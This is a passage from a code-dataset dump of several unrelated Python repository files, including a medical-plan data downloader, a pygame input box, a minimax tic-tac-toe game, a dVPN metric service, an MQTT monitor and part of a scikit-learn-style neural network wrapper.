json\n\nclient = MongoClient('mongodb://localhost:27017/')\ndb = client.var_hub\n\ndef download_patients():\n    patients = db.patients\n\n    if patients.count_documents({}) == 0:\n        patients_ids = requests.get(\"https://junction-planreview.azurewebsites.net/api/patients\").json()\n        for id in patients_ids:\n            patient = requests.get(\"https://junction-planreview.azurewebsites.net/api/patients/\" + id).json()\n            patients.insert_one(patient)\n\ndef download_plans():\n    plans = db.plans\n\n    if plans.count_documents({}) == 0:\n        patients_ids = requests.get(\"https://junction-planreview.azurewebsites.net/api/patients\").json()\n        for id in patients_ids:\n            plans_ids = requests.get(\"https://junction-planreview.azurewebsites.net/api/patients/\" + id + \"/plans\").json()\n            for plan_id in plans_ids:\n                plan = requests.get(\"https://junction-planreview.azurewebsites.net/api/patients/\" + id + \"/plans/\" + plan_id).json()\n                plans.insert_one(plan)\n\ndef get_patients():\n    return db.patients.find({})\n\ndef get_patient(id):\n    return db.patients.find_one({'Id': id})\n\ndef get_patient_plans_ids(id):\n    return [plan['Id'] for plan in db.patients.find_one({'Id': id})['Plans']]\n\ndef put_test_to_db():\n    tests = db.tests\n    if tests.count_documents({}) == 0:\n        with open('tests.json', 'r') as infile:\n            data = json.loads(infile.read())\n            for datum in data:\n                if isinstance(datum, dict):\n                    tests.insert_one(datum)  # a dict is one document; insert_many expects an iterable of documents\n\ndef download():\n    put_test_to_db()\n    download_patients()\n    download_plans()","repo_name":"pw94/VarHub","sub_path":"data_downloader.py","file_name":"data_downloader.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40185268485","text":"import pygame\n\n#Class for creating input boxes\nclass InputBox:\n\n    def __init__(self, width, height, x, y, text=''):\n        self.COLOR_INACTIVE = pygame.Color((1, 110, 95))\n        self.COLOR_ACTIVE = pygame.Color((138, 255, 243))\n        self.surf = 
pygame.Surface((width, height))\n self.FONT = pygame.font.Font('./Font/pixelated.ttf', int(height/2))\n self.rect = pygame.Rect(x, y, width, height)\n self.surf.fill((71,222,207))\n self.color = self.COLOR_INACTIVE\n self.text = text\n self.txt_surface = self.FONT.render(text, True, self.color)\n self.active = False\n\n def handle_event(self, event):\n if event.type == pygame.MOUSEBUTTONDOWN:\n # If the user clicked on the input_box rect.\n if self.rect.collidepoint(event.pos):\n # Toggle the active variable.\n self.active = not self.active\n else:\n self.active = False\n # Change the current color of the input box.\n self.color = self.COLOR_ACTIVE if self.active else self.COLOR_INACTIVE\n if event.type == pygame.KEYDOWN:\n if self.active:\n if event.key == pygame.K_BACKSPACE:\n self.text = self.text[:-1]\n else:\n self.text += event.unicode\n # Re-render the text.\n self.txt_surface = self.FONT.render(self.text, True, self.color)\n\n\n def draw(self, screen):\n # Blit the text.\n screen.blit(self.surf, (self.rect.x, self.rect.y))\n screen.blit(self.txt_surface, (self.rect.x+5, self.rect.y+5))\n # Blit the rect.\n pygame.draw.rect(screen, self.color, self.rect, 2)\n\n def getText(self):\n return self.text","repo_name":"mjausmanis/Farkle","sub_path":"input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35169429923","text":"#!/usr/bin/env python3\n\n\ndef copy_board(board):\n return [x[:] for x in board]\n\ndef convert2d(num):\n i = (num - 1) // 3\n j = (num - 1) % 3\n return i,j\n\ndef minimax(board, turn, index):\n endgame, winner = game_over(board)\n #reached terminal node, return score\n if endgame:\n if winner == 'O':\n return 1\n elif winner == 'X':\n return -1\n else:\n return 0\n #expand nodes\n children = []\n new_positions = []\n cur_score = 0\n scores = []\n for i in range(3):\n for j in range(3):\n if board[i][j] == ' ':\n temp = copy_board(board)\n temp[i][j] = turn\n children.append(temp)\n new_positions.append([i,j])\n\n #set next turn\n next_turn = ''\n if turn == 'X':\n next_turn = 'O'\n else:\n next_turn = 'X'\n\n #recurse\n for i in range(len(children)):\n temp_score = minimax(children[i], next_turn, index)\n scores.append(temp_score)\n\n #get max score if on max turn, vice versa\n if turn == 'X':\n cur_score = min(scores)\n cur_score_ind = scores.index(cur_score)\n else:\n cur_score = max(scores)\n cur_score_ind = scores.index(cur_score)\n\n #set position of best move\n index[0] = new_positions[cur_score_ind][0]\n index[1] = new_positions[cur_score_ind][1]\n\n return cur_score\n\n\n\ndef player_turn(board):\n x = ''\n i = 0\n j = 0\n while True:\n test = input(\"Enter X position (1-9): \")\n try:\n x = int(test)\n except ValueError:\n print(\"invalid input!\")\n continue\n\n i,j = convert2d(x)\n\n if (x > 9 or x < 1):\n print(\"Valid positions are #1-9.\")\n continue\n elif (board[i][j] != ' '):\n print(\"Position already taken.\")\n continue\n else:\n board[i][j] = 'X'\n break\n return\n\ndef cpu_turn(board):\n pos = [0,0]\n minimax(board, 'O', pos)\n board[pos[0]][pos[1]] = 'O'\n return\n\ndef game_over(board):\n game_over = False\n draw = True\n winner = ''\n\n #check draw\n for i in range(3):\n for j in range(3):\n if board[i][j] == ' ':\n draw = False\n if draw is True:\n game_over = True\n\n #check horizontals\n for x in board:\n if (x[0] == x[1] == x[2] == 'X'):\n winner = 'X'\n game_over = True\n elif (x[0] == x[1] == x[2] == 'O'):\n 
winner = 'O'\n game_over = True\n\n #check verticals\n for x in range(3):\n if (board[0][x] == board[1][x] == board[2][x] == 'X'):\n winner = 'X'\n game_over = True\n elif (board[0][x] == board[1][x] == board[2][x] == 'O'):\n winner = 'O'\n game_over = True\n\n #check diagonals\n if (board[0][0] == board[1][1] == board[2][2] == 'X'):\n winner = 'X'\n game_over = True\n elif (board[0][0] == board[1][1] == board[2][2] == 'O'):\n winner = 'O'\n game_over = True\n elif (board[2][0] == board[1][1] == board[0][2] == 'O'):\n winner = 'O'\n game_over = True\n elif (board[2][0] == board[1][1] == board[0][2] == 'X'):\n winner = 'X'\n game_over = True\n\n return game_over, winner\n\n\n\ndef print_board(board):\n print(' ', board[0][0], \"|\", board[0][1], \"|\", board[0][2])\n print(\" -----------\")\n print(' ', board[1][0], \"|\", board[1][1], \"|\", board[1][2])\n print(\" -----------\")\n print(' ', board[2][0], \"|\", board[2][1], \"|\", board[2][2])\n\ndef main():\n turn = 0\n board = [[' ',' ',' '],\n [' ',' ',' '],\n [' ',' ',' ']]\n while not game_over(board)[0]:\n if (turn % 2 == 0):\n print_board(board)\n player_turn(board)\n else:\n cpu_turn(board)\n turn += 1\n\n if (game_over(board)[1] != ''):\n print_board(board)\n print(\"~~~ \", game_over(board)[1], \" wins! ~~~\")\n elif (game_over(board)[1] == ''):\n print_board(board)\n print(\"--- It's a Draw! ---\")\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tshiels/minimax_tictactoe","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74318606562","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('Posts', '0003_post_font_board'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='post',\n old_name='font_board',\n new_name='front_board',\n ),\n ]\n","repo_name":"GitYCC/django_ycnote","sub_path":"YCBlog/Posts/migrations/0004_auto_20170320_0834.py","file_name":"0004_auto_20170320_0834.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43156395006","text":"import json, random\n\nfrom helpers import addProbability, testProbabilities, getProbableTag, buildDataModels\n\n\ndef buildTagParagraph(dataDict, wordCount, seedWord):\n\tcurKey = seedWord\n\n\tdef toKey(keyTuple):\n\t\treturn ' '.join(keyTuple)\n\n\t# print(\"seed='%s'\" % (toKey(curKey), ))\n\t\n\ttagParagraph = []\n\twhile(len(tagParagraph) < wordCount):\n\t\t# print(\"curKey='%s'\" % (toKey(curKey), ))\n\t\twordList = dataDict[toKey(curKey)]\n\t\t# print(wordList)\n\t\t# print(':' + str(wordList))\n\t\t# curKey = random.choice(wordList)[1]\n\t\tval = random.random()\n\t\tcurKey.append(getProbableTag(val, wordList)[1])\n\t\tcurKey = curKey[1:]\n\t\ttagParagraph.append(toKey(curKey))\n\n\treturn tagParagraph\n\ndef buildParagraph(tagParagraph, tagToWordDict):\n\tparagraph = []\n\tfor tags in tagParagraph:\n\t\t# for tag in tags.split():\n\t\ttagssplit = tags.split()\n\t\ttag = \"\"\n\t\tif(len(tagssplit) > 1):\n\t\t\ttag = tagssplit[1]\n\t\telse:\n\t\t\ttag = tagssplit[0]\n\t\tval = random.random()\n\t\tword = getProbableTag(val, tagToWordDict[tag])\n\t\tparagraph.append(word[1])\n\treturn paragraph\n\ndef run(ngram, tag2word, seed):\n\t(dataDict, tagToWordDict) = 
buildDataModels(ngram, tag2word, seed)\n\n\ttagParagraph = buildTagParagraph(dataDict, 100, seedWord=seed)\n\n\n\n\tparagraph = buildParagraph(tagParagraph, tagToWordDict)\n\tprint(' '.join(paragraph))\n\ndef main():\n\t# run('data/poem_unigram.json', 'data/poem_tag_to_word.json', [\"\"])\n\trun('data/at_bigram.json', 'data/at_tag_to_word.json', [\"\", \"\"])\n\nif __name__ == '__main__':\n\tmain()","repo_name":"camhart/cs470_pos_tagging","sub_path":"ngramparagraph.py","file_name":"ngramparagraph.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20211940540","text":"\"\"\"dVPN Metric Service to collect, store and retrieve dApp metrics\"\"\"\n\nfrom datetime import datetime, timedelta\n\nfrom ..interfaces import AbstractGlobalMetricService\n\nclass VPNMetricService(AbstractGlobalMetricService):\n\tdata_prefix = 'vpn'\n\tintervals = {\n\t\t'hourly': 3600,\n\t\t'daily': 3600*24\n\t}\n\n\tdef __init__(self, config, logger, metric_repository, mnsync_service, mn_gateway):\n\t\t\"\"\" Constructor \"\"\"\n\t\tself.config = config\n\t\tself.logger = logger\n\t\tself.repo = metric_repository\n\t\tself.mnsync_service = mnsync_service\n\t\tself.mn_gateway = mn_gateway\n\n\tdef get_recent_metrics(self, interval_name):\n\t\t\"\"\" Retrieves metrics for the last specified time interval \"\"\"\n\t\tself._assert_interval_supported(interval_name)\n\t\t\n\t\tnow = datetime.now()\n\n\t\tif interval_name == 'hourly':\n\t\t\tkey_timeformat = \"hourly:%m-%d_%H\"\n\t\t\tlast_time = now - timedelta(hours=1)\n\t\t\tlast_time_since = last_time - timedelta(hours=1)\n\t\telif interval_name == 'daily':\n\t\t\tkey_timeformat = \"daily:%m-%d\"\n\t\t\tlast_time = now - timedelta(days=1)\n\t\t\tlast_time_since = last_time - timedelta(days=1)\n\t\telse:\n\t\t\treturn {}\t# this should not happen\n\n\t\tlast_metrics_key = '{}:{}'.format(self.data_prefix, last_time.strftime(key_timeformat))\n\n\t\tif not self.repo.exists(last_metrics_key):\n\t\t\tself.logger.info('VPNMetricService::get_recent_metrics: No recent metrics in database for interval ' + interval_name)\n\t\t\treturn {}\n\n\t\treturn self.repo.get(last_metrics_key)\n\n\n\tdef update_recent_metrics(self, interval_name):\n\t\t\"\"\" Calculates and updates metrics for the last specified time interval \"\"\"\n\t\tself._assert_interval_supported(interval_name)\n\t\t\n\t\tnow = datetime.now()\n\n\t\tif interval_name == 'hourly':\n\t\t\tkey_timeformat = \"hourly:%m-%d_%H\"\n\t\t\tprev_time = now - timedelta(hours=1)\n\t\telif interval_name == 'daily':\n\t\t\tkey_timeformat = \"daily:%m-%d\"\n\t\t\tprev_time = now - timedelta(days=1)\n\t\telse:\n\t\t\tself.logger.debug('VPNMetricService::update_recent_metrics: No action for interval ' + interval_name)\n\t\t\treturn\n\n\t\tprev_metrics_key = '{}:{}'.format(self.data_prefix, prev_time.strftime(key_timeformat))\n\t\tcur_metrics_key = '{}:{}'.format(self.data_prefix, now.strftime(key_timeformat))\n\t\tcur_metrics_state = self._get_current_metrics()\n\n\t\tif self.repo.exists(cur_metrics_key + ':state'):\n\t\t\tself.logger.info('VPNMetricService::update_recent_metrics: Metrics state already saved for interval ' + interval_name)\n\t\t\treturn\n\n\t\tself.repo.store(cur_metrics_key + ':state', cur_metrics_state)\n\n\t\tif self.repo.exists(prev_metrics_key + ':state'):\n\t\t\tprev_metrics_state = self.repo.get(prev_metrics_key + ':state')\n\n\t\telse:\n\t\t\tself.logger.debug('VPNMetricService::update_recent_metrics: No previous 
metric records found for interval ' + interval_name)\n\t\t\treturn\n\n\t\tself.repo.store(cur_metrics_key, {\n\t\t\t'interval_since': prev_time.isoformat().split('.')[0],\t# remove milliseconds\n\t\t\t'interval_until': now.isoformat().split('.')[0],\n\t\t\t**self._compare_metrics(prev_metrics_state, cur_metrics_state)\n\t\t\t})\n\n\tdef get_global_metrics(self, interval_name):\n\t\t\"\"\" Retrieves global metrics for the last specified time interval \"\"\"\n\t\tself._assert_interval_supported(interval_name, exclude=[\"hourly\"])\n\n\t\tnow = datetime.now()\n\t\tyesterday = now - timedelta(days=1)\n\t\tmetrics_key = 'global:daily:{}:{}'.format(self.data_prefix, yesterday.strftime(\"%m-%d\"))\n\n\t\tif not self.repo.exists(metrics_key):\n\t\t\tself.logger.info('VPNMetricService::get_global_metrics: No recent metrics in database for interval ' + interval_name)\n\t\t\treturn {}\n\n\t\treturn self.repo.get(metrics_key)\n\n\tdef update_global_metrics(self, interval_name):\n\t\t\"\"\" Updates global metrics from all the masternodes, could be time consuming \"\"\"\n\t\tself._assert_interval_supported(interval_name, exclude=[\"hourly\"])\n\n\t\tnow = datetime.now()\n\t\tyesterday = now - timedelta(days=1)\n\t\tmetrics_key = 'global:daily:{}:{}'.format(self.data_prefix, yesterday.strftime(\"%m-%d\"))\n\n\t\tif self.repo.exists(metrics_key):\n\t\t\tself.logger.info('VPNMetricService::update_global_metrics: Found already existing metrics in database for interval ' + interval_name)\n\t\t\treturn\n\n\t\tself.repo.store(metrics_key, {\n\t\t\t'interval_since': yesterday.isoformat().split('.')[0],\t# remove milliseconds\n\t\t\t'interval_until': now.isoformat().split('.')[0],\n\t\t\t**self._collect_global_metrics(interval_name)\n\t\t\t})\n\n\n\t# Private methods\n\tdef _get_current_metrics(self):\n\t\t\"\"\"Returns current dVPN metric state, as per OS internal counter\"\"\"\n\t\tinterface = self.config['dapps.vpn'].get('tun_interface', 'tun1')\n\t\tbytes_in, bytes_out = self._get_network_bytes(interface)\n\t\treturn { 'bytes_in': bytes_in, 'bytes_out': bytes_out}\n\n\tdef _compare_metrics(self, previous_metrics, current_metrics):\n\t\t\"\"\"Returns delta of two dVPN metric states, e.g. 
of both components bytes_in and bytes_out\"\"\"\n\t\ttry:\n\t\t\tif current_metrics['bytes_in'] < previous_metrics['bytes_in'] or current_metrics['bytes_out'] < previous_metrics['bytes_out']:\n\t\t\t\tself.logger.info('VPNMetricService::_compare_metrics: VPN metrics have been reset within last hour, not enough data')\n\t\t\t\treturn { 'bytes_in': 0, 'bytes_out': 0}\n\n\t\t\treturn {\n\t\t\t\t'bytes_in': current_metrics['bytes_in'] - previous_metrics['bytes_in'],\n\t\t\t\t'bytes_out': current_metrics['bytes_out'] - previous_metrics['bytes_out'],\n\t\t\t}\n\t\texcept Exception as e:\n\t\t\traise Exception('VPNMetricService::_compare_metrics: Failed to compare given metrics: ' + str(e))\n\n\tdef _get_network_bytes(self, interface):\n\t\t\"\"\"Returns number of bytes in and out of specified network interface since boot/ifup\"\"\"\n\t\tfor line in open('/proc/net/dev', 'r'):\n\t\t\tif interface in line:\n\t\t\t\tdata = line.split('%s:' % interface)[1].split()\n\t\t\t\trx_bytes, tx_bytes = (data[0], data[8])\n\t\t\t\treturn (int(rx_bytes), int(tx_bytes))\n\t\traise Exception('VPNMetricService::_get_network_bytes: Network interface not found: ' + interface)\n\n\tdef _collect_global_metrics(self, interval_name):\n\t\t\"\"\"Collects the global metrics from all of the service nodes, should be run from async job\"\"\"\n\t\tself._assert_interval_supported(interval_name, exclude=[\"hourly\"])\n\t\tglobal_metrics = {}\n\t\tscalar_params = ['bytes_in', 'bytes_out']\n\n\t\tfor ip, mn in self.mnsync_service.get_masternode_list(status_filter='ACTIVE').items():\n\t\t\tself.logger.debug('Collecting global metrics from node ' + ip)\n\t\t\t\n\t\t\tresponse = self.mn_gateway.webapi_query(ip) \n\n\t\t\tif response.error:\n\t\t\t\tself.logger.warning('Failed to collect VPN metrics from the node: ' + ip + ': ' + str(response.error))\n\t\t\t\tcontinue\n\n\t\t\tfor param in scalar_params:\n\t\t\t\ttry:\n\t\t\t\t\tvalue = response.result['services']['VPN']['metrics'][interval_name]['bytes_in']\n\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tself.logger.warning('Failed to parse VPN metrics info from node: ' + ip + ': ' + str(e))\n\t\t\t\t\tcontinue\n\n\t\t\t\tif param not in global_metrics:\n\t\t\t\t\tglobal_metrics[param] = value\n\t\t\t\telse:\n\t\t\t\t\tglobal_metrics[param] += value\n\n\t\treturn global_metrics\n\n\tdef _assert_interval_supported(self, interval_name, exclude = None):\n\t\tif not interval_name in self.intervals or exclude and interval_name == exclude:\n\t\t\traise Exception('VPNMetricService::update_recent_metrics: Unsupported interval ' + interval_name)\n\n","repo_name":"velescore/veles-masternode","sub_path":"masternode/dapps/vpn/metric_service.py","file_name":"metric_service.py","file_ext":"py","file_size_in_byte":7058,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"22037538563","text":"\"\"\" mqtt_monitor \"\"\"\n\nimport asyncio.exceptions\nimport json\nfrom os import PathLike\nfrom pathlib import Path\nimport sys\nimport time\nfrom typing import Dict, List, Optional, TypedDict, Union\n\nimport click\nimport paho.mqtt.client as mqtt # type: ignore\nfrom pydantic import BaseModel\n\nclass UserData(TypedDict):\n \"\"\" userdata typing \"\"\"\n hostname: str\n port: str\n topics: List[str]\n keepalives: int\n\n\nclass ConfigFile(BaseModel):\n \"\"\" mqtt-monitor configuration model \"\"\"\n hostname: str\n port: int = 1883\n topics: List[str] = []\n keepalives: int = 60\n\nCONNECT_RC = {\n 0: \"Connection successful\",\n 1: \"Connection 
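
A brief note on the `_compare_metrics` logic above: `/proc/net/dev` counters are monotonic only until a reboot or interface reset, so a delta that goes negative means the window is unusable. A minimal standalone sketch of that guard, assuming the same `{'bytes_in': ..., 'bytes_out': ...}` state dicts the service stores:

```python
def counter_delta(prev, cur):
    """Delta of two counter snapshots, mirroring VPNMetricService._compare_metrics."""
    # Counters reset on reboot/ifdown; a decrease means we lack a full window of data.
    if cur['bytes_in'] < prev['bytes_in'] or cur['bytes_out'] < prev['bytes_out']:
        return {'bytes_in': 0, 'bytes_out': 0}
    return {k: cur[k] - prev[k] for k in ('bytes_in', 'bytes_out')}

print(counter_delta({'bytes_in': 100, 'bytes_out': 50},
                    {'bytes_in': 340, 'bytes_out': 90}))
# {'bytes_in': 240, 'bytes_out': 40}
```
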
refused - incorrect protocol version\",\n 2: \"Connection refused - invalid client identifier\",\n 3: \"Connection refused - server unavailable\",\n 4: \"Connection refused - bad username or password\",\n 5: \"Connection refused - not authorised\",\n # 6-255: Currently unused.\n}\n\n\n\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(\n client: mqtt.Client,\n userdata: UserData,\n _: Dict[str, Union[int, str]],\n result_code: int,\n ) -> None:\n \"\"\" on_connect method \"\"\"\n msg = json.dumps({\n \"action\" : \"connected\",\n \"message\" : CONNECT_RC.get(result_code,f\"Unknown result code: {result_code}\"),\n })\n print(msg, file=sys.stderr)\n\n # Subscribing in on_connect() means that if we lose the connection and\n # reconnect then subscriptions will be renewed.\n for topic in userdata[\"topics\"]:\n client.subscribe(topic=topic)\n\n# The callback for when a PUBLISH message is received from the server.\n# pylint: disable=unused-argument\ndef on_message(\n client: mqtt.Client,\n userdata: UserData,\n msg: mqtt.MQTTMessage,\n ) -> None: # pylint: disable=unused-argument\n \"\"\" message handler \"\"\"\n try:\n message = json.loads(msg.payload)\n except json.JSONDecodeError:\n if isinstance(msg.payload, str):\n message = msg.payload.encode(\"utf-8\")\n else:\n message = msg.payload.decode(\"utf-8\")\n data = {\n \"_time\" : time.time(),\n \"topic\" : msg.topic,\n \"msg\" : message,\n }\n print(json.dumps(data, default=str, ensure_ascii=False), file=sys.stderr)\n\n@click.command()\n@click.option(\"--config-file\", type=Path, default=\"~/.config/mqtt-monitor.json\")\n@click.option(\"--hostname\")\n@click.option(\n \"--port\", \"-p\",\n type=int,\n default=1883,\n help=\"Port to connect to.\")\n@click.option(\n \"--topic\", \"-t\",\n default=None,\n multiple=True,\n help=\"Default is '#' which shows everything but system messages, can specify multiple times.\",\n )\ndef cli(\n config_file: Path=Path(\"~/.config/mqtt-monitor.json\"),\n hostname: Optional[str]=None,\n topic: Optional[List[str]]=None,\n port: int=1883,\n ) -> None:\n \"\"\" MQTT Monitor \"\"\"\n\n config_filepath = Path(config_file).expanduser().resolve()\n\n if config_filepath.exists():\n config = ConfigFile.parse_file(config_filepath)\n elif Path(\"mqtt-monitor.json\").exists():\n config = ConfigFile.parse_file(\"mqtt-monitor.json\")\n else:\n config = ConfigFile(hostname=hostname, topics=topic, port=port)\n\n print(json.dumps({\n \"action\" : \"startup\",\n \"hostname\" : config.hostname,\n \"port\" : config.port,\n \"topics\" : config.topics,\n }), file=sys.stderr)\n\n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n\n client.user_data_set(config.dict())\n\n while True:\n try:\n client.connect(\n config.hostname,\n config.port,\n config.keepalives,\n )\n\n # Blocking call that processes network traffic, dispatches callbacks and\n # handles reconnecting.\n # Other loop*() functions are available that give a threaded interface and a\n # manual interface.\n client.loop_forever()\n except asyncio.exceptions.TimeoutError as error_message:\n print(json.dumps({\n \"error\" : \"timeout\",\n \"message\" : f\"sleeping for 60 seconds: {error_message}\",\n }), file=sys.stderr)\n time.sleep(60)\n except Exception as error: #pylint: disable=broad-except\n print(f\"Error, sleeping for 5 seconds: {error}\", file=sys.stderr)\n 
time.sleep(5)\n","repo_name":"yaleman/mqtt-monitor","sub_path":"mqtt_monitor/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28531338512","text":"# -*- coding: utf-8 -*-\nfrom __future__ import (absolute_import, unicode_literals, print_function)\n\n__all__ = ['Regressor', 'Classifier', 'Layer', 'Convolution']\n\nimport os\nimport sys\nimport math\nimport time\nimport logging\nimport itertools\n\nlog = logging.getLogger('sknn')\n\n\nimport numpy\nimport theano\nimport sklearn.base\nimport sklearn.pipeline\nimport sklearn.preprocessing\nimport sklearn.cross_validation\n\nfrom .nn import NeuralNetwork, Layer, Convolution, ansi\nfrom . import backend\n\n\nclass MultiLayerPerceptron(NeuralNetwork, sklearn.base.BaseEstimator):\n # Abstract base class for wrapping multi-layer perceptron functionality.\n __doc__ = NeuralNetwork.__doc__\n\n def _setup(self):\n pass\n\n def _initialize(self, X, y=None):\n assert not self.is_initialized,\\\n \"This neural network has already been initialized.\"\n self._create_specs(X, y)\n\n backend.setup()\n self._backend = backend.MultiLayerPerceptronBackend(self)\n return self._backend._initialize_impl(X, y)\n\n def _check_layer(self, layer, required, optional=[]):\n required.extend(['name', 'type'])\n for r in required:\n if getattr(layer, r) is None:\n raise ValueError(\"Layer type `%s` requires parameter `%s`.\"\\\n % (layer.type, r))\n\n optional.extend(['dropout', 'weight_decay'])\n for a in layer.__dict__:\n if a in required+optional:\n continue\n if getattr(layer, a) is not None:\n log.warning(\"Parameter `%s` is unused for layer type `%s`.\"\\\n % (a, layer.type))\n\n def _create_specs(self, X, y=None):\n # Automatically work out the output unit count based on dataset.\n if y is not None and self.layers[-1].units is None:\n self.layers[-1].units = y.shape[1]\n else:\n assert y is None or self.layers[-1].units == y.shape[1],\\\n \"Mismatch between dataset size and units in output layer.\"\n\n # Then compute the number of units in each layer for initialization.\n self.unit_counts = [numpy.product(X.shape[1:]) if self.is_convolution else X.shape[1]]\n res = X.shape[1:3] if self.is_convolution else None\n\n for l in self.layers:\n if isinstance(l, Convolution):\n assert l.kernel_shape is not None,\\\n \"Layer `%s` requires parameter `kernel_shape` to be set.\" % (l.name,)\n if l.border_mode == 'valid':\n res = (int((res[0] - l.kernel_shape[0]) / l.kernel_stride[0]) + 1,\n int((res[1] - l.kernel_shape[1]) / l.kernel_stride[1]) + 1)\n if l.border_mode == 'full':\n res = (int((res[0] + l.kernel_shape[0]) / l.kernel_stride[0]) - 1,\n int((res[1] + l.kernel_shape[1]) / l.kernel_stride[1]) - 1)\n unit_count = numpy.prod(res) * l.channels\n else:\n unit_count = l.units\n\n self.unit_counts.append(unit_count)\n\n def __getstate__(self):\n d = self.__dict__.copy()\n\n # If the MLP does not exist, then the client code is trying to serialize\n # this object to communicate between multiple processes.\n if self._backend is not None:\n d['weights'] = self._backend._mlp_to_array()\n\n for k in [k for k in d.keys() if k.startswith('_')]:\n del d[k]\n return d\n\n def __setstate__(self, d):\n self.__dict__.update(d)\n\n # Only create the MLP if the weights were serialized. 
Otherwise, it\n # may have been serialized for multiprocessing reasons pre-training.\n self._create_logger()\n self._backend = None\n\n def _reshape(self, X, y=None):\n if y is not None and y.ndim == 1:\n y = y.reshape((y.shape[0], 1))\n if self.is_convolution and X.ndim == 3:\n X = X.reshape((X.shape[0], X.shape[1], X.shape[2], 1))\n if self.is_convolution and X.ndim == 2:\n size = math.sqrt(X.shape[1])\n assert size.is_integer(),\\\n \"Input array is not in image shape, and could not assume a square.\"\n X = X.reshape((X.shape[0], int(size), int(size), 1))\n if not self.is_convolution and X.ndim > 2:\n X = X.reshape((X.shape[0], numpy.product(X.shape[1:])))\n return X, y\n\n def _fit(self, X, y):\n assert X.shape[0] == y.shape[0],\\\n \"Expecting same number of input and output samples.\"\n data_shape, data_size = X.shape, X.size+y.size\n X, y = self._reshape(X, y)\n\n if not self.is_initialized:\n X, y = self._initialize(X, y)\n\n log.info(\"Training on dataset of {:,} samples with {:,} total size.\".format(data_shape[0], data_size))\n if data_shape[1:] != X.shape[1:]:\n log.warning(\" - Reshaping input array from {} to {}.\".format(data_shape, X.shape))\n if self.valid_set is not None:\n X_v, _ = self.valid_set\n log.debug(\" - Train: {: <9,} Valid: {: <4,}\".format(X.shape[0], X_v.shape[0]))\n if self.regularize is not None:\n comment = \", auto-enabled from layers\" if self.regularize is None else \"\"\n log.debug(\" - Using `%s` for regularization%s.\" % (self.regularize, comment))\n if self.n_iter is not None:\n log.debug(\" - Terminating loop after {} total iterations.\".format(self.n_iter))\n if self.n_stable is not None and self.n_stable < (self.n_iter or sys.maxsize):\n log.debug(\" - Early termination after {} stable iterations.\".format(self.n_stable))\n\n if self.verbose:\n log.debug(\"\\nEpoch Validation Error Time\"\n \"\\n-----------------------------------\")\n\n try:\n self._backend._train_impl(X, y)\n except RuntimeError as e:\n log.error(\"\\n{}{}{}\\n\\n{}\\n\".format(\n ansi.RED,\n \"A runtime exception was caught during training. 
This likely occurred due to\\n\"\n \"a divergence of the SGD algorithm, and NaN floats were found by PyLearn2.\",\n ansi.ENDC,\n \"Try setting the `learning_rate` 10x lower to resolve this, for example:\\n\"\n \" learning_rate=%f\" % (self.learning_rate * 0.1)))\n raise e\n\n return self\n\n def _predict(self, X):\n X, _ = self._reshape(X)\n\n if self._backend is None:\n assert self.layers[-1].units is not None,\\\n \"You must specify the number of units to predict without fitting.\"\n if self.weights is None:\n log.warning(\"WARNING: Computing estimates with an untrained network.\")\n self._initialize(X)\n\n if not isinstance(X, numpy.ndarray):\n X = X.toarray()\n return self._backend._predict_impl(X)\n\n def get_params(self, deep=True):\n result = super(MultiLayerPerceptron, self).get_params(deep=True)\n for l in self.layers:\n result[l.name] = l\n return result\n\n\nclass Regressor(MultiLayerPerceptron, sklearn.base.RegressorMixin):\n # Regressor compatible with sklearn that wraps various NN implementations.\n\n def fit(self, X, y):\n \"\"\"Fit the neural network to the given continuous data as a regression problem.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_inputs)\n Training vectors as real numbers, where n_samples is the number of\n samples and n_inputs is the number of input features.\n\n y : array-like, shape (n_samples, n_outputs)\n Target values are real numbers used as regression targets.\n\n Returns\n -------\n self : object\n Returns this instance.\n \"\"\"\n return super(Regressor, self)._fit(X, y)\n\n def predict(self, X):\n \"\"\"Calculate predictions for specified inputs.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_inputs)\n The input samples as real numbers.\n\n Returns\n -------\n y : array, shape (n_samples, n_outputs)\n The predicted values as real numbers.\n \"\"\"\n return super(Regressor, self)._predict(X)\n\n\nclass Classifier(MultiLayerPerceptron, sklearn.base.ClassifierMixin):\n # Classifier compatible with sklearn that wraps various NN implementations.\n\n def _setup(self):\n super(Classifier, self)._setup()\n self.label_binarizers = []\n\n # WARNING: Unfortunately, sklearn's LabelBinarizer handles binary data\n # as a special case and encodes it very differently to multiclass cases.\n # In our case, we want to have 2D outputs when there are 2 classes, or\n # the predicted probabilities (e.g. 
